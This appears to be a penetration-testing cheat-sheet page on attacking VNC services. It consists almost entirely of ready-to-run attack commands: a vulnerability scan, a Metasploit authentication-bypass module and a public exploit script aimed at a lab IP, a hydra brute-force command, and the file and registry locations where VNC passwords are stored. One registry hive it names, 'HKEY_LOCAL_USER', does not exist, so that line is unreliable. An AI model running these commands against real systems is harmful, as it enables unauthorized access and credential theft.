VNC 5800 5900

1. Nmap - VNC Information and Vulnerability Scanning:

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13

2. Metasploit - RealVNC Authentication Bypass

use auxiliary/scanner/vnc/vnc_none_auth
set rhosts 10.11.1.13
set rport 5800
set threads 1
run

3. RealVNC Authentication Bypass (Exploit):

sudo searchsploit -m windows/remote/36932.py
python2 36932.py  #input target IP

4. Hydra - Brute-forcing VNC

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV

5. Password Default Locations

  • Linux (TightVNC/other): Default password is stored in:

    ~/.vnc/passwd

  • Windows - RealVNC: VNC password can be found in:

    HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver

  • Windows - TightVNC: Password in:

    HKEY_CURRENT_USER\Software\TightVNC\Server

  • Windows - TigerVNC: Stored in:

    HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4

  • Windows - UltraVNC: VNC credentials stored in:

    C:\Program Files\UltraVNC\ultravnc.ini
PreviousWinRM 5985 5986NextRedis 6379

Last updated